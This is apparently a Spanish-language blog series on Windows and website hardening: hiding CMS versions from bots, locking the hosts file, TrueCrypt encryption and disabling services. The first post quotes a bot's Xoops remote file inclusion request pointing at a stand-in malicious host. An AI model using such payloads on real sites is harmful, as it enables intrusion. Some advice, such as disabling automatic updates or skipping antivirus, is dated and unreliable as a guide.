En internet existen redes bots para enviar spam o para hacer ataques automáticos en páginas web encontradas en Google. Mi web como probablemente muchas más no está lejos de esta realidad y diariamente es atacada por docenas de bots y tipos de ataques.

En principio, estos bots son creados por alguien que pretende comprometer una web de manera automática en un CMS conocido, la gran mayoría con ataques simples de XSS o SQL Injection y tratando de explotar en muchos casos una vulnerabilidad conocida del CMS que uses.

Para evitar solo un poco este tipo de ataques que puede causar estragos si se nos olvida actualizar no está de más aplicar lo que se llama “oscuridad como seguridad”. Simplemente se trata de una técnica de eliminar cualquier información de qué CMS usas y qué versión. Si no lo haces,  estos datos son guardados por los buscadores y son los usados por los bots, si no los mostramos dichos bots no deberían atacar con frecuencia nuestra web.

Para demostrar un poco eso de los bots desde hace meses he recibido ataques en este tema de mi blog:  Actualizando de Xoops 2.0.18 a Xoops 2.3.0 RC Todos los ataques han sido de bots pretendiendo explotar una vulnerabilidad en Xoops CMS obviamente sin éxito.

/blog/2008/08/26/actualizando-de-xoops-2018-a-xoops-230-rc/xoops_lib/modules/protector/module_icon.php?mydirpath=http://web-maligna.com/id1.txt?

La razón obvia de ese ataque es que el tema en cuestión de mi bog incluye las frases xoops y la versión que a parte se muestra en google.

Debo decir que a mi me ha funcionado disminuyendo las visitas de bots que son molestos y consumen ancho de banda, pero esta técnica es completamente inútil para un atacante humano, así que no crean que agregarán mucha seguridad con esto ;)

PD: Existen bots que hacen pentest en las webs donde se desconoce el CMS y guardan los resultados en los servidores donde se alojan, así cuidense de los pentest también ;)

Salu2

En la actualidad una de las técnicas más usadas por los malwares es escribir entradas en el hosts para hacer redirecciones. Por ejemplo, para que cuando el usuario infectado trate de acceder a google lo envíe a una página de falsos antivirus o de un buscador falso.

Esto representa un riesgo alto en la seguridad ya que el malware podría hacer redirecciones de bancos por páginas fraudulentas y así, robar la información personal de acceso al banco. Para evitar de forma efectiva este tipo de cosas y sin tener que instalar ningún programa de terceros podemos realizar los siguientes pasos que solo funcionan con Windows 2000 / Windows XP Professional / Windows Vista; los usuarios de Windows XP Home necesitan instalar un parche proporcionado por Microsoft.

Antes de realizar los pasos verifique que el contenido del archivo hosts sea el correcto; puede verificar eso siguiendo este enlace: Archivo Hosts

Nos dirigimos a Opciones de carpeta > Pestaña Ver y deshabilitamos la opción Utilizar uso compartido de archivos simples (recomendado).

Nos dirigimos a %windir%\system32\drivers y ahí deberíamos ver el directorio llamado etc. Hacemos clic con el botón derecho sobre el directorio > elegimos propiedades > nos dirigimos a la pestaña seguridad y agregamos a nuestro usuario actual.

En los permisos para evitar escritura simplemente marcamos en la casilla Denegar – Escribir; con eso estaremos estableciendo permisos de solo lectura para nuestro usuario a todos los archivos contenidos en etc. Si se hace un cambio de usuario estos valores no serán tomados en cuenta, si usas muchos usuarios lo mejor es que los agreges a un grupo y le establezcas solo privilegios de lectura sobre ese directorio.

Tome en cuenta que el hacer este cambio podría provocar problemas con la instalación de Windows Live Messenger; si ya lo tenías instalado no debe haber inconveniente.

Salu2

Obviamente los antivirus no son invulnerables ni tampoco una herramienta indispensable a la hora de proteger. Hace mucho tiempo vengo diciendo que a estas alturas, si eres un paranóico de la seguridad (como yo) no uses antivirus debido a que crea agujeros de seguridad para tu sistema.

Recientemente leyendo un tema en Kriptopolis me encuentro que realmente no estoy tan errado. En el tema mencionan un detalle bastante importante y es el hecho de que se han hecho pruebas donde se afirma que se han recopilado unas 800 vulnerabilidades producidas por programas antivirus.

Los antivirus no son herramientas indispensables para un sistema realmente; obviamente, si eres un clic-maníaco será un suicidio estar sin antivirus en un sistema Windows pero para otros más precavidos no es necesario uno de estos programas o en el mayor de los casos, el más sencillo de los antivirus le servidrá y sobrará.

¿Y cómo evito los virus entonces?

Algo de sentido común podría servir realmente. Un sistema bien protegido con restricciones de acceso sería difícil de infectar. Si a eso le sumamos un programa para establecer permisos será muy complejo que un virus simplemente pueda si quiera, ejecutarse en nuestro sistema.

Hay tantos usuarios con miles de herramientas para protegerse y aún así se infectan, otros tienen su cautela y viven sin 1 solo malware…. las 2 caras de la moneda; ¿con cual te quedas tu? ;).

Salu2

Una de las cosas más importantes que debemos hacer si poseemos datos con información sensible es utilizar el cifrado. Windows 2000 y XP de manera predeterminada traen EFS el cual permite cifrar el contenido de manera fácil y totalmente transparente al usuario.

EFS utiliza entre otras cosas la autenticación del usuario, si alguien tiene acceso a la contraseña de usuario podrá fácilmente descifrar el contenido sin problemas. Windows es un sistema fácilmente escalable y por consiguiente cualquier persona con conocimientos un poco más allá de los básicos podría obtener acceso a los datos sensibles.

Otro detalle de EFS es que no permite el cifrado en unidades que no sea NTFS y a su vez, no permite cifrar todo el contenido de una unidad.

En Windows Vista se incluye la herramienta BitLocker para cifrado de unidades, pero este tema no es para Windows Vista.

Para Windows 2000 o XP por el hecho de no poseer una herramienta de manera predeterminada sólida para el cifrado de datos, utilizaremos TrueCrytp.

¿Qué importancia tiene cifrar los datos?

Mucha gente posee laptops y no quiere que sus datos personales caigan en manos no debidas, si es una persona con suficiente malicia podría publicar algo tuyo en Internet de manera burlona o algo peor, hacerse pasar por ti. Cosas como números bancarios, números de cédula de identidad, contraseñas, curriculums vitae, fotos y otros documentos pueden ser lo suficientemente reveladores para una persona maliciosa; por consiguiente debemos proteger esos datos.

En un país como Venezuela, donde la mayoría de la gente que se dedica a robar no tiene ningún tipo de cultura y no saben lo que es un computador esto no es mayor problema, pero no siempre podemos correr con la misma suerte no? ;).

Si fueras el gerente de una empresa importante o de algún ente importante es SUMAMENTE recomendable que cifres tus datos, no queremos que la base de datos con todos los datos de tus clientes caiga en manos equivocadas.

TrueCrypt:

TrueCrypt es una herramienta gratuita y código abierto que nos permite cifrar una unidad bajo un sistema de cifrado AES de 256bits, suficiente para mantener los datos seguros de cualquiera. Es completamente compatible con sistemas Linux y Windows, hace un cifrado completo de las unidades, puede hacer borrado seguro de los datos para que no quede rastro de ellos luego de haberlos cifrado.

También permite cifrar la partición donde se encuentre alojado el sistema operativo, así nadie tendrá acceso ni si quiera a los temporales del sistema lo que la convierte en una herramienta indispensable a la hora de tomarse en serio la seguridad de nuestros datos personales de atacantes que puedan tener acceso local a nuestro ordenador.

Podemos descargar TrueCrypt desde la página del autor que es:

http://www.truecrypt.org/

Una vez descargado lo instalamos y procederemos a instalarlo y a cifrar nuestra unidad principal donde esté alojado el sistema y las demás particiones que tengamos. Probablemente si separamos mucho las particiones en base a este primer documento se nos complicará la cosa porque en teoría, debemos cifrar también la partición del Swap y de los temporales.

El cifrar esas 2 particiones implica que solo serán montadas automáticamente cuando inicie TrueCrypt (si lo configuramos para que lo hiciera) y eso podría generar problemas al sistema aunque no son problemas graves realmente ;).

En dicho caso podrías no tener que cifrar el Swap, solo habilitar una directiva para que sea eliminado al cerrar el sistema o simplemente que no sea usado, esto en el caso de que poseas 2Gb o más de memoria ram.

Para la partición del temporal no habría tampoco mucho problema; el %temp% es usado en la mayoría del tiempo solo por programas y no específicamente por el sistema, tomando en cuenta que los programas se cargan después del sistema no habría mucho de que preocuparse.

Lo malo…

Cifrar los datos tiene cosas buenas y cosas malas, yo solo mencionaré 3 pero podrían sacar unas más no? ;).

1- Si se te daña de alguna forma el sistema o somos infectados por un virus (aunque si seguiste los pasos de estos documentos eso no debería suceder) pero crees que tenía solución accediendo mediante un LiveCD de Linux o Windows tus esperanzas se verán aplastadas porque no podrás acceder a los datos a menos que el LiveCD incluya una herramienta compatible con el cifrado. Esto en teoría lo podríamos solucionar con un LiveCD que contenga TrueCrypt instalado como por ejemplo el grml.

2- Si el disco duro sufre algún daño y deja de funcionar adecuadamente la solución más simple sería sacar la unidad, conectarla de alguna forma a otro computador y sacar los datos pero… momento…. están cifrados y como el disco duro tiene un daño seguramente no se te hará tan sencillo sacar los datos incluso si sabes la contraseña.

3- Si se dañase el MBR del disco duro y no iniciara reinstalarlo con el CD de Windows no sería una buena opción ya que recuerda que el disco está cifrado.

Todo esto tiene una simple solución; hacer varios respaldos de los datos en varias unidades distintas, si se quiere también cifradas pero guardadas en un lugar seguro donde no se puedan dañar con facilidad.

Como siempre, se aceptan sugerencias, críticas y comentarios.

Capítulos anteriores:

Seguridad en Windows capítulo 6: Servicios.

Seguridad en Windows capitulo 5: Aplicando restricciones.

Seguridad en Windows capítulo 4: Firewall, antivirus, antispyware.

Seguridad en Windows capítulo 3: Actualizaciones del sistema

Seguridad en Windows capítulo 2: Grupos de usuarios, privilegios, directivas de seguridad y auditorías.

Seguridad en Windows capítulo 1: Particiones.

Salu2

Luego de una buena tardanza para continuar con mis manuales de seguridad en Windows principalmente por falta de ganas de escribir sobre él, decidí volver a ponerme de lleno nuevamente con los capítulos.

Esta vez vamos a hablar de los servicios y cómo influye en la seguridad del sistema un servicio ejecutándose.

¿Qué es un servicio?

Según Wikipedia es lo siguiente:

Es un tipo especial de proceso informático que se ejecuta en segundo plano en vez de ser controlado directamente por el usuario (es un proceso no interactivo). Este tipo de programas se ejecutan de forma continua (infinita), vale decir, que aunque se intente cerrar o matar el proceso, este continuará en ejecución o se reiniciará automáticamente. Todo esto sin intervención de terceros y sin dependencia de consola alguna.

La idea principal de un Servicio es que se inicie con el sistema y permita acciones en segundo plano sin que sean ejecutadas directamente por el usuario o desde el usuario que estamos usando. Por ejemplo puede que iniciemos sesión bajo el usuario Pedrito pero el Servicio Tor Win32 (Servicio de Tor) podría ejecutarse con privilegios administrativos otorgados por el usuario Administrador o podría ejecutarse bajo el usuario SYSTEM.

El principal problema de seguridad de un servicio viene por los posibles privilegios que tenga y cómo podría afectar en la seguridad del sistema, por ejemplo un servicio que funcione para actualizar un programa, supongamos, Tor; no debería tener privilegios totales. Supongamos que la actualización de ese programa se realiza de la siguiente manera: Se necesita acceso de escritura / ejecución / eliminación desde %temp% y se necesita acceso de escritura / lectura / eliminación al directorio de Tor, la actualización no recorrerá otro camino ni buscará en otros directorios; si ésto es cierto quiere decir que no requiere acceso a %windir% ni a %userprofile% (a menos que %temp% esté configurado de manera predeterminada) ni a ningún otro directorio ¿para qué se lo vamos a dar?.

Si el servicio tuviese control total fácilmente alguien podría incrustar un código en él y poder escribir en cualquier otro lugar, por ejemplo, borrar el contenido de Mis Documentos, así que no es algo realmente seguro no? ;).

Lamentablemente dejamos en sus manos nuestra seguridad por lo que la mejor forma de protegerse es no instalar un sin número de programas o si se quiere, de servicios.

Muchos programas pueden funcionar perfectamente con sus servicios desactivados, quizá no todos tengan esta propiedad pero si gran parte de los programas por lo que desactivar servicios sería lo mejor. La mayoría de los servicios de los programas tienen la función de comprobar actualizaciones para el programa, algo que podemos hacer de manera manual; también de comprobar estados de licencias u ofrecer funcionalidades que probablemente no utilizaremos, antes de desactivar cualquier servicio de un programa de terceros es bueno comprobar si necesitamos sus funcionalidades.

Los servicios de Windows recomendados para desactivar son:

Restaurar sistema: si no usamos restaurar sistema, algo que no recomiendo usar.
Ayuda de Windows: Para eso tenemos la ayuda de Microisoft desde su propia Web.
Mensajero: El servicio mensajero tiene la finalidad de poder enviar y recibir mensajes desde tu pc a otros computadores. Lo malo es que muchos se aprovecharon de este servicio para enviar Spam masivo.

Ayuda de TCP/IP sobre NetBIOS: ¿Estás en una red que requiere acceso a través del protocolo NetBIOS?; algo que no es común de ver y si no lo necesitas desactiva el servicio.

Programador de tareas: ¿Te gusta programar tareas para que se inicien en un momento determinado?; de no ser así deshabilita este servicio. Toma en cuenta que el Prefetch de Windows depende de Programador de tareas, y el Prefetch no es algo realmente malo pero yo no lo necesito ni lo uso ¿y tu? ;).

Compatibilidad de cambio rápido de usuario: Permite cambiar de usuario con una combinación de teclas (Win+L), Si usas normalmente un solo usuario en tu sistema deshabilita la opción porque no la utilizarás.

Agente de Protección de acceso a redes: Incluido en el SP3 de Windows XP y en algunas versiones Windows Vista, permite evitar el acceso a un sistema desde una red LAN si el sistema no está actualizado con los últimos parches; necesitas esa funcionalidad? ;)

Actualizaciones automáticas: Recomiendo desactivar el servicio siempre y realizar las actualizaciones de manera manual, así evitaremos el consumo excesivo de procesador de svchost.exe; este problema ya tiene su solución y respectivo parche de todas formas.

Administrador de conexión de acceso remoto: Permite tener acceso a redes VPN o de acceso telefónico, si no lo usamos mejor desactivarlo.

Servicios de Terminal Server: Nos permite utilizar el programa Escritorio Remoto en Windows; funcionalidad que en algún momento tuvo un fallo de seguridad que permitía acceder al sistema de manera remota sin que el usuario se diera cuenta; a pesar de que ya está solucionado desde hace años no recomiendo activar este servicio a menos que lo vayamos a usar.

Enrutamiento y acceso remoto: Es un servicio muy vulnerable del sistema, permite conexiones entrantes no autenticadas para acceder a ciertos recursos del sistema, algo para nada seguro; se recomienda deshabilitar el servicio.

Telnet: Permite que un usuario remoto pueda tener conexión a nuestro equipo a través de una línea de comandos; si no pretendes utilizar esta funcionalidad es altamente recomendable que la deshabilites.

Registro remoto: Permite que alguien en la red pueda modificar de manera remota el registro del sistema; muy inseguro así que deberías deshabilitarlo.

Es importante que entienda que cada servicio nombrado se recomienda desactivar solo porque son los menos usados y/o inútiles; muchos incluso pueden llegar a ser inseguros, pero si usted usa frecuentemente alguno no lo desactive. Recuerden que mientras menos cosas tengamos iniciadas en el sistema menos posibilidades de fallos de seguridad tenemos ;)

Se recomienda verificar las dependencias de cada servicio para así evitar que desactiven funcionalidades que probablemente utilicemos.

No crean que al desactivar todos esos servicios van a estar mucho más seguros, no es así, pero tendremos menos lugares explotables.

Como siempre, se aceptan sugerencias, críticas y comentarios.

Capítulos anteriores:

Seguridad en Windows capitulo 5: Aplicando restricciones.

Seguridad en Windows capítulo 4: Firewall, antivirus, antispyware.

Seguridad en Windows capítulo 3: Actualizaciones del sistema

Seguridad en Windows capítulo 2: Grupos de usuarios, privilegios, directivas de seguridad y auditorías.

Seguridad en Windows capítulo 1: Particiones.

Salu2